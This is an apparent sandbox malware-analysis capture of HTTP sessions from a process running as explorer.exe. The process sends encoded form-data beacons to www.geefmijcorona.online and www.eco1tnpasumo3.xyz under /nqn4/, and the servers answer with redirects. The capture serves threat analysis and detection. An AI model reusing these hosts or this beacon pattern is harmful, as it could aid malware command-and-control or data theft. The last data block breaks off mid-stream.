                                                                                          Location: http://trust-top.net/nqn4/?T2MpwT=n9MfkADJlGV/yt7v9R1KFrF+APzpIOm/DYQis6iYSXuIjWSgUnKCQKlQm8ZLyuu4NEBr&VDK0L=5jZhjDchE
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          20192.168.2.349884145.131.10.22680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:44.941771984 CEST5911OUTPOST /nqn4/ HTTP/1.1
                                                                                          Host: www.geefmijcorona.online
                                                                                          Connection: close
                                                                                          Content-Length: 412
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.geefmijcorona.online
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.geefmijcorona.online/nqn4/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 54 32 4d 70 77 54 3d 34 5a 63 31 38 43 28 6d 34 57 72 59 31 72 4e 4f 4f 77 39 61 67 6f 65 4f 5a 42 36 62 47 49 56 63 69 72 4b 4b 7a 48 69 55 77 74 44 44 34 78 6a 57 44 6c 70 4b 47 32 41 62 4c 30 4f 57 39 56 4b 61 6f 6c 75 4a 67 4c 6b 71 36 4f 75 69 48 66 33 75 66 6d 59 6a 64 5a 62 4c 6d 46 68 77 76 4b 65 57 34 74 49 45 33 30 66 46 6a 57 55 57 79 76 4d 74 6d 6f 68 44 54 4a 62 41 44 33 6b 41 53 75 44 6c 42 39 52 74 35 4d 42 38 72 50 6e 44 64 42 56 69 73 49 52 37 50 2d 57 72 32 6a 6b 41 49 44 44 62 62 4c 7a 61 7e 36 71 55 35 42 62 47 48 79 6c 6d 61 63 74 71 45 30 68 35 4a 45 31 6a 6d 38 77 6d 75 76 5a 38 35 31 35 2d 6e 54 4d 6e 76 75 63 63 4a 4a 54 74 55 55 7e 4c 51 73 62 5f 45 47 76 6d 55 71 44 35 53 4f 63 74 55 62 4b 7a 67 36 57 76 69 48 36 53 59 52 56 33 68 67 4d 47 4f 4a 35 41 4b 63 71 4e 53 64 41 53 38 63 76 6d 50 48 64 44 70 56 74 61 38 4d 52 6f 54 56 69 38 6a 72 36 46 58 33 50 78 36 4d 50 67 39 78 66 41 6d 32 6d 6b 30 61 31 6a 34 31 6d 4e 75 6d 38 33 6b 54 4a 43 38 36 73 50 4e 55 49 53 6a 6f 34 46 30 56 28 35 69 34 79 5f 56 5a 39 66 74 66 45 72 4e 52 6b 62 36 6f 4a 49 58 55 47 2d 6d 6d 7a 58 36 62 7a 58 6f 6d 4d 5a 64 74 42 53 33 6a 69 6e 47 50 52 75 47 51 54 71 7e 42 6d 2d 77 78 49 79 35 6e 69 72 34 51 29 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: T2MpwT=4Zc18C(m4WrY1rNOOw9agoeOZB6bGIVcirKKzHiUwtDD4xjWDlpKG2AbL0OW9VKaoluJgLkq6OuiHf3ufmYjdZbLmFhwvKeW4tIE30fFjWUWyvMtmohDTJbAD3kASuDlB9Rt5MB8rPnDdBVisIR7P-Wr2jkAIDDbbLza~6qU5BbGHylmactqE0h5JE1jm8wmuvZ8515-nTMnvuccJJTtUU~LQsb_EGvmUqD5SOctUbKzg6WviH6SYRV3hgMGOJ5AKcqNSdAS8cvmPHdDpVta8MRoTVi8jr6FX3Px6MPg9xfAm2mk0a1j41mNum83kTJC86sPNUISjo4F0V(5i4y_VZ9ftfErNRkb6oJIXUG-mmzX6bzXomMZdtBS3jinGPRuGQTq~Bm-wxIy5nir4Q).
                                                                                          Oct 8, 2021 10:03:44.988437891 CEST5913INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:03:44 GMT
                                                                                          Server: Apache
                                                                                          Cache-Control: max-age=86400, public, s-maxage=86400
                                                                                          Location: /
                                                                                          Vary: Origin
                                                                                          Content-Length: 250
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          X-Varnish: 114794675
                                                                                          Age: 0
                                                                                          Via: 1.1 varnish-v4
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/'" /> <title>Redirecting to /</title> </head> <body> Redirecting to <a href="/">/</a>. </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          21192.168.2.349885145.131.10.22680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:44.978625059 CEST5913OUTPOST /nqn4/ HTTP/1.1
                                                                                          Host: www.geefmijcorona.online
                                                                                          Connection: close
                                                                                          Content-Length: 36480
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.geefmijcorona.online
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.geefmijcorona.online/nqn4/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 54 32 4d 70 77 54 3d 34 5a 63 31 38 47 37 73 31 47 58 4e 37 62 41 59 50 69 64 6f 34 4a 75 49 62 58 6d 71 61 5a 4a 44 77 50 75 65 39 6c 71 70 78 74 72 5a 38 42 50 76 55 55 68 53 47 79 4a 78 43 6d 62 66 73 45 32 62 6f 6c 32 57 67 49 49 71 35 4f 57 79 45 5f 48 55 65 45 41 67 5a 35 62 37 6e 46 67 32 72 50 36 33 34 73 59 32 33 30 6d 43 6a 6d 41 57 7a 4b 41 74 67 72 4a 49 63 4a 62 47 66 6e 31 42 63 4f 66 53 42 39 70 4c 35 4a 35 38 72 66 37 44 50 52 46 6a 37 5f 4e 34 56 65 57 75 7a 6a 6b 4a 66 53 28 6c 62 4b 6a 34 7e 36 6d 55 35 7a 50 47 49 42 74 6d 63 74 74 70 4c 6b 68 38 62 30 31 2d 74 63 31 71 75 76 31 4b 35 77 42 75 6e 6a 34 6e 76 65 63 5a 65 75 47 59 54 44 71 63 44 74 75 56 45 47 54 50 58 34 33 78 53 4b 45 42 53 70 53 69 76 38 43 4a 69 43 6a 5f 66 78 56 7a 30 51 4d 64 4f 4a 35 38 4b 63 72 73 53 64 51 53 38 64 33 6d 50 6b 31 44 72 77 42 64 68 63 52 70 45 46 69 65 6e 72 32 58 58 33 6e 68 36 4d 48 61 6f 53 7a 41 6e 58 57 6b 79 6f 64 67 31 56 6d 4c 67 47 38 55 7a 44 4a 33 38 36 74 5f 4e 56 49 43 6a 62 63 46 30 41 54 35 6a 65 6d 5f 57 70 39 66 75 66 45 6c 59 68 6f 4c 36 70 74 4d 58 55 32 75 6d 56 66 58 35 4e 6e 58 6f 48 4d 5a 63 39 42 53 75 7a 6a 6c 4b 75 77 4b 54 33 72 47 36 67 61 6b 6d 6d 4e 6e 39 45 33 45 36 5f 44 5a 66 62 57 65 50 61 53 61 61 6d 41 77 79 35 74 48 6c 63 45 48 4a 6c 35 53 5a 65 56 39 39 65 79 66 68 67 6b 50 52 30 43 31 6d 30 70 49 5a 46 4a 77 5a 35 54 37 66 7a 42 74 31 63 75 4c 57 34 65 38 45 4b 58 65 28 74 74 6e 33 74 70 69 51 75 4a 47 6b 34 62 6d 67 6e 6a 78 73 2d 7e 51 5a 76 39 48 77 37 47 58 37 71 43 67 6f 46 77 7a 33 52 7a 42 6f 79 6d 2d 4b 73 6e 44 64 47 65 71 33 63 45 63 55 59 59 6e 34 78 33 6c 45 73 32 78 55 53 45 4e 6c 55 53 72 5a 48 48 4d 7a 6f 66 50 7a 78 50 6f 4f 46 68 69 66 6f 4e 5a 76 4c 70 62 6e 4f 68 5f 62 41 63 50 34 55 67 70 73 78 32 4d 63 38 72 4e 53 63 46 53 72 68 6e 54 63 58 67 79 65 4f 6b 63 31 35 79 57 38 65 76 58 7e 66 49 6e 71 61 31 46 6e 56 6e 4b 62 6b 77 32 75 59 4d 55 70 38 59 44 4c 41 77 5a 38 68 49 74 53 42 46 4c 70 73 62 53 34 68 31 44 51 41 36 30 49 31 7a 48 4b 70 6b 5a 7e 4b 39 79 7a 5a 75 47 45 33 6f 39 53 47 41 67 30 2d 68 70 6c 74 49 65 28 5a 28 6f 59 4d 5a 2d 32 7a 7e 79 35 58 49 39 4c 39 45 46 35 76 62 59 54 72 72 54 66 54 63 38 4d 6d 62 44 4e 51 4a 31 6f 50 57 57 4e 78 51 4e 78 41 45 5f 31 43 47 72 38 35 6b 53 6d 5f 62 41 35 77 6a 51 69 55 54 6b 59 6d 54 61 55 45 75 6b 63 75 31 4b 65 78 79 51 45 65 52 65 45 66 45 70 7a 63 6c 59 54 72 39 4a 59 6b 64 4a 49 7a 56 57 4b 74 34 44 45 37 70 2d 73 45 4b 59 72 6a 5a 67 78 46 39 6f 4b 65 4f 5a 57 67 4e 65 6a 4b 6d 4b 36 65 4c 78 31 66 5a 63 44 77 77 34 49 4a 71 64 51 42 56 42 58 78 57 5a 54 47 43 70 67 33 45 45 44 4a 7a 6e 69 78 7e 46 53 68 44 56 68 45 71 61 6c 4b 28 65 62 32 4c 62 59 55 69 74 65 2d 39 34 57 77 6d 65 78
                                                                                          Data Ascii: T2MpwT=4Zc18G7s1GXN7bAYPido4JuIbXmqaZJDwPue9lqpxtrZ8BPvUUhSGyJxCmbfsE2bol2WgIIq5OWyE_HUeEAgZ5b7nFg2rP634sY230mCjmAWzKAtgrJIcJbGfn1BcOfSB9pL5J58rf7DPRFj7_N4VeWuzjkJfS(lbKj4~6mU5zPGIBtmcttpLkh8b01-tc1quv1K5wBunj4nvecZeuGYTDqcDtuVEGTPX43xSKEBSpSiv8CJiCj_fxVz0QMdOJ58KcrsSdQS8d3mPk1DrwBdhcRpEFienr2XX3nh6MHaoSzAnXWkyodg1VmLgG8UzDJ386t_NVICjbcF0AT5jem_Wp9fufElYhoL6ptMXU2umVfX5NnXoHMZc9BSuzjlKuwKT3rG6gakmmNn9E3E6_DZfbWePaSaamAwy5tHlcEHJl5SZeV99eyfhgkPR0C1m0pIZFJwZ5T7fzBt1cuLW4e8EKXe(ttn3tpiQuJGk4bmgnjxs-~QZv9Hw7GX7qCgoFwz3RzBoym-KsnDdGeq3cEcUYYn4x3lEs2xUSENlUSrZHHMzofPzxPoOFhifoNZvLpbnOh_bAcP4Ugpsx2Mc8rNScFSrhnTcXgyeOkc15yW8evX~fInqa1FnVnKbkw2uYMUp8YDLAwZ8hItSBFLpsbS4h1DQA60I1zHKpkZ~K9yzZuGE3o9SGAg0-hpltIe(Z(oYMZ-2z~y5XI9L9EF5vbYTrrTfTc8MmbDNQJ1oPWWNxQNxAE_1CGr85kSm_bA5wjQiUTkYmTaUEukcu1KexyQEeReEfEpzclYTr9JYkdJIzVWKt4DE7p-sEKYrjZgxF9oKeOZWgNejKmK6eLx1fZcDww4IJqdQBVBXxWZTGCpg3EEDJznix~FShDVhEqalK(eb2LbYUite-94Wwmex
                                                                                          Oct 8, 2021 10:03:45.060002089 CEST5928OUTData Raw: 2d 44 6d 6c 72 44 54 31 59 50 5a 28 61 7e 38 63 63 51 30 57 7a 33 76 7a 67 34 4e 62 58 74 43 53 4c 36 57 69 6b 42 53 4e 79 46 6c 6a 6c 44 74 58 4b 4f 5a 52 58 77 30 43 59 4c 78 6d 54 48 79 30 55 51 72 6a 44 48 5a 47 68 4d 58 36 62 42 34 49 30 69
                                                                                          Data Ascii: -DmlrDT1YPZ(a~8ccQ0Wz3vzg4NbXtCSL6WikBSNyFljlDtXKOZRXw0CYLxmTHy0UQrjDHZGhMX6bB4I0i1QNi9pwlG6mkOWqSNei(p3kcS9JRVftMeG0GjUQqG03ReHk5gO5RKoLpLGfpoUBlqvEbEZIWYqA23vxK6ZA1qTG4qSannZ-qIe-cG(6S-mH~qsyNXC-dGRHvJxywND4zBnsJwmzpB7MiSWcWqnHuPSPjBYqizBju9
                                                                                          Oct 8, 2021 10:03:45.087825060 CEST5934OUTData Raw: 6e 28 6a 6d 56 52 57 31 73 39 49 33 79 56 49 58 37 61 41 49 49 46 74 68 41 71 59 71 46 52 35 77 77 66 36 57 36 43 4f 72 35 34 43 71 6d 55 63 67 50 72 62 36 71 4e 73 45 6f 59 2d 71 6c 44 6c 36 54 66 76 73 30 37 74 34 76 6a 50 37 45 68 5a 6e 4a 35
                                                                                          Data Ascii: n(jmVRW1s9I3yVIX7aAIIFthAqYqFR5wwf6W6COr54CqmUcgPrb6qNsEoY-qlDl6Tfvs07t4vjP7EhZnJ5m6xWgPUUNTyLyH-ZKCRb9MqEinvZxXIe16s(DWlnti4plCb32VT5bWHwChby7aBtMErh5h0wN1yT-PIoXL3x7lfebHjHpRBAmm44B57K6phNFta3gTPeOJJBWxBJ53uqbdXwyANM7WMPMKfBYfrQTqlKJfNboPcZY
                                                                                          Oct 8, 2021 10:03:45.087925911 CEST5950OUTData Raw: 58 55 2d 73 6b 7a 39 70 44 72 62 79 70 69 6e 6b 75 63 63 6a 30 59 45 6b 2d 64 58 4c 53 75 34 62 4b 48 33 74 44 7e 4c 63 33 36 48 64 67 58 39 74 68 57 49 6c 51 78 6b 28 34 6f 47 62 77 51 75 51 42 39 6b 52 33 4e 53 31 33 4a 7a 6b 30 46 62 77 73 48
                                                                                          Data Ascii: XU-skz9pDrbypinkuccj0YEk-dXLSu4bKH3tD~Lc36HdgX9thWIlQxk(4oGbwQuQB9kR3NS13Jzk0FbwsHLJeRPWU8WTlp-bue_hmJoULGjjOCt1A91UmqiOz9padRWds(4AqDN1KSVJdT36aA2Tg~BjxT3dCMS4XvUx4a3ooaEuqPGooCBJ4M55TdJ2iJmiRqrkx4RxBsyN6GSmAbjAl3QeG2MQoVk3ftQG-w6f4GKrQJk29yL
                                                                                          Oct 8, 2021 10:03:45.147413015 CEST5951INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:03:45 GMT
                                                                                          Server: Apache
                                                                                          X-Powered-By: PHP/7.4.22
                                                                                          Cache-Control: max-age=86400, public, s-maxage=86400
                                                                                          Location: /
                                                                                          Vary: Origin
                                                                                          Content-Length: 250
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          X-Varnish: 109146329
                                                                                          Age: 0
                                                                                          Via: 1.1 varnish-v4
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/'" /> <title>Redirecting to /</title> </head> <body> Redirecting to <a href="/">/</a>. </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          22192.168.2.349886145.131.10.22680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:03:45.018847942 CEST5914OUTGET /nqn4/?T2MpwT=3boPinz1+GTktZtFPn4Wh9WVNEiaR4p62fPMr1up18b62Q31EEwhNzwdf2qpwnv2m2XV&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.geefmijcorona.online
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:03:45.065290928 CEST5929INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:03:45 GMT
                                                                                          Server: Apache
                                                                                          Cache-Control: max-age=86400, public, s-maxage=86400
                                                                                          Location: /
                                                                                          Vary: Origin
                                                                                          Content-Length: 250
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          X-Varnish: 51418111
                                                                                          Age: 0
                                                                                          Via: 1.1 varnish-v4
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='/'" /> <title>Redirecting to /</title> </head> <body> Redirecting to <a href="/">/</a>. </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          23192.168.2.349888150.95.255.3880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:04:05.712555885 CEST5961OUTPOST /nqn4/ HTTP/1.1
                                                                                          Host: www.eco1tnpasumo3.xyz
                                                                                          Connection: close
                                                                                          Content-Length: 412
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.eco1tnpasumo3.xyz
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.eco1tnpasumo3.xyz/nqn4/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 54 32 4d 70 77 54 3d 67 59 54 31 47 77 6b 69 63 33 76 4a 47 43 6d 66 4e 49 77 55 4e 4c 51 63 41 31 30 54 74 5a 41 74 37 54 4b 72 39 77 72 2d 55 50 79 55 65 49 28 68 43 4c 7a 4f 45 6c 6a 64 36 53 38 78 28 32 34 63 71 4f 31 63 61 6b 71 41 4f 70 75 6d 74 36 45 39 4d 57 33 6d 63 75 4f 58 6d 55 70 61 7e 75 73 75 62 6f 55 43 6f 46 33 70 65 51 45 77 71 4c 4b 69 7a 4a 6c 79 38 66 44 69 49 39 49 48 6f 5f 61 48 56 31 39 4c 33 39 66 55 6a 43 65 67 6a 4c 53 44 55 30 43 6c 42 39 47 7a 65 6b 61 70 4b 42 63 58 45 6c 67 35 59 56 76 49 49 45 41 72 4b 41 52 32 6b 69 67 5f 68 43 4c 4f 61 4e 35 61 67 46 77 50 33 58 7a 67 55 6d 77 5a 46 77 64 77 30 75 79 46 52 45 65 71 78 34 53 51 69 73 30 62 70 72 4f 7a 44 47 78 73 6d 64 64 70 47 73 39 48 6c 58 45 65 37 38 58 66 6b 36 53 75 78 42 5a 67 53 52 6c 43 71 4b 34 77 76 72 37 2d 79 4e 73 71 67 69 39 55 4c 6f 4e 56 6a 45 58 62 63 31 6e 4c 76 36 72 56 38 75 4b 67 4a 6e 4a 49 56 5f 66 67 31 46 32 6c 4f 77 54 69 4c 6b 35 49 30 79 45 36 7a 5a 42 41 47 48 46 72 79 4a 61 6a 71 34 28 6a 43 36 55 7a 36 67 42 45 30 47 4f 61 34 53 69 36 49 71 4c 71 65 55 67 46 4b 2d 75 55 32 6b 49 78 4d 72 57 70 31 5f 69 69 6e 58 58 61 32 6b 75 52 35 39 63 6a 4e 67 4c 69 35 46 45 6f 66 50 31 64 59 38 67 47 5a 77 29 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: T2MpwT=gYT1Gwkic3vJGCmfNIwUNLQcA10TtZAt7TKr9wr-UPyUeI(hCLzOEljd6S8x(24cqO1cakqAOpumt6E9MW3mcuOXmUpa~usuboUCoF3peQEwqLKizJly8fDiI9IHo_aHV19L39fUjCegjLSDU0ClB9GzekapKBcXElg5YVvIIEArKAR2kig_hCLOaN5agFwP3XzgUmwZFwdw0uyFREeqx4SQis0bprOzDGxsmddpGs9HlXEe78Xfk6SuxBZgSRlCqK4wvr7-yNsqgi9ULoNVjEXbc1nLv6rV8uKgJnJIV_fg1F2lOwTiLk5I0yE6zZBAGHFryJajq4(jC6Uz6gBE0GOa4Si6IqLqeUgFK-uU2kIxMrWp1_iinXXa2kuR59cjNgLi5FEofP1dY8gGZw).
                                                                                          Oct 8, 2021 10:04:06.010356903 CEST5975INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:04:05 GMT
                                                                                          Server: Apache
                                                                                          Location: http://dfltweb1.onamae.com
                                                                                          Content-Length: 210
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          24192.168.2.349889150.95.255.3880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:04:05.999614954 CEST5974OUTPOST /nqn4/ HTTP/1.1
                                                                                          Host: www.eco1tnpasumo3.xyz
                                                                                          Connection: close
                                                                                          Content-Length: 36480
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.eco1tnpasumo3.xyz
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.eco1tnpasumo3.xyz/nqn4/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 54 32 4d 70 77 54 3d 67 59 54 31 47 31 45 30 53 6e 54 51 49 79 71 73 42 61 41 2d 46 59 49 65 47 45 41 63 30 6f 73 4d 28 6d 36 56 67 42 62 44 58 4f 62 4c 56 63 66 63 56 63 28 57 45 6c 54 30 79 42 59 39 31 32 6b 62 71 4e 45 50 61 6b 75 41 63 5a 57 32 74 64 41 48 4d 30 66 68 64 4f 4f 72 6e 55 6f 4b 76 5f 77 50 62 6f 42 68 6f 46 7e 6b 65 67 51 77 72 6f 79 69 31 4b 39 31 79 66 44 65 58 4e 5a 65 6c 66 58 74 56 31 31 44 33 38 7a 55 6a 79 61 67 68 72 43 45 66 58 36 6d 4d 4e 47 79 53 45 62 35 64 52 68 75 45 6c 73 62 59 58 37 49 49 33 6b 72 4b 52 78 32 6c 52 49 38 71 53 4c 58 65 4e 34 61 6b 46 38 65 33 55 48 61 55 6b 63 6e 46 46 74 77 31 65 79 45 56 58 4f 4d 37 4c 71 4c 67 73 77 38 70 72 4c 58 44 58 39 6b 6d 66 4a 46 52 4e 74 73 71 55 38 77 37 2d 62 6c 33 4b 54 6e 7e 68 5a 33 53 52 6c 79 71 4b 34 4f 76 72 72 2d 79 4b 51 71 68 41 46 55 50 4e 78 61 73 45 58 61 58 56 6e 6c 68 61 32 78 38 75 43 77 4a 6e 68 79 56 4d 7a 67 36 45 47 6c 4a 42 54 6c 65 55 35 53 70 69 45 52 6d 4a 42 31 47 48 46 4a 79 4d 76 34 71 70 6a 6a 4e 4c 55 7a 38 43 70 45 6e 47 4f 61 6b 43 69 34 47 4c 32 79 65 55 35 4f 4b 37 53 2d 32 54 34 78 4d 2d 61 70 37 37 32 69 30 33 58 61 36 45 76 30 77 5f 35 71 59 43 50 4a 28 6d 5a 57 4a 50 41 59 5a 76 38 50 48 45 47 55 32 7a 57 32 4c 34 43 52 61 72 7a 4e 79 46 64 68 45 63 28 5a 4c 76 47 39 71 67 31 6d 46 37 43 5a 47 34 28 59 45 6e 69 52 58 44 71 69 67 67 54 38 41 49 67 31 7e 32 43 79 6c 4e 49 30 59 63 78 51 74 68 61 68 75 6f 7e 54 46 43 55 4a 6b 36 4b 55 31 4f 47 58 69 77 28 32 63 65 41 78 58 79 56 44 6f 31 65 44 6e 69 65 6e 62 4f 50 46 52 53 4a 39 6a 66 50 59 6f 2d 43 71 42 46 70 57 42 2d 39 70 6d 2d 6f 50 35 39 76 35 71 78 46 6e 56 35 75 2d 4d 36 36 36 37 4f 75 63 31 6d 4f 47 30 6d 6d 4d 67 68 70 45 42 6e 64 55 64 46 4b 59 62 53 48 57 61 7a 35 38 4c 69 55 42 45 63 28 61 53 39 65 74 49 67 6f 4a 62 38 45 53 66 6e 38 39 71 6c 4f 36 4e 4d 58 56 28 62 75 4b 43 59 52 79 61 72 58 5f 32 6f 58 39 4c 39 72 33 31 74 62 7a 7e 35 54 5f 55 69 5a 62 34 56 7e 6e 38 48 69 45 6f 54 33 4f 6a 78 56 51 62 73 31 67 4d 63 7e 46 68 47 48 73 28 79 73 36 59 52 39 6d 46 49 6e 59 28 35 58 54 4e 67 4c 79 6d 78 4a 33 52 4a 34 6d 4b 2d 37 56 43 75 70 6a 49 75 70 68 5a 56 58 78 75 58 41 6d 63 6d 36 48 4e 44 30 58 46 51 30 69 43 4a 54 72 46 49 68 71 66 56 6c 4e 43 77 4a 54 67 4b 77 42 33 69 65 77 28 37 47 30 30 5a 76 6f 28 44 76 35 4e 33 6a 4d 6e 78 43 78 6a 57 41 54 63 45 37 47 37 42 46 44 52 39 36 6a 39 4d 52 61 75 6d 50 6e 46 57 55 33 5a 31 69 74 70 72 53 4f 66 33 68 67 37 72 4e 53 6f 77 71 5a 6c 44 53 6c 51 38 4b 32 6f 35 46 4b 56 43 33 55 35 4d 76 31 53 69 4b 6c 68 56 45 6c 34 52 63 34 64 56 7e 37 4c 47 33 4c 6d 61 58 31 4e 74 7a 76 71 45 49 54 31 5a 46 34 31 52 4b 48 71 6a 49 68 75 69 4a 6a 4e 41 6f 5a 55 37 67 4c 4d 39 52 4f 4a 65 69 67 42 30 72 41 46 4e 43 57 67 6f 58 74 7e 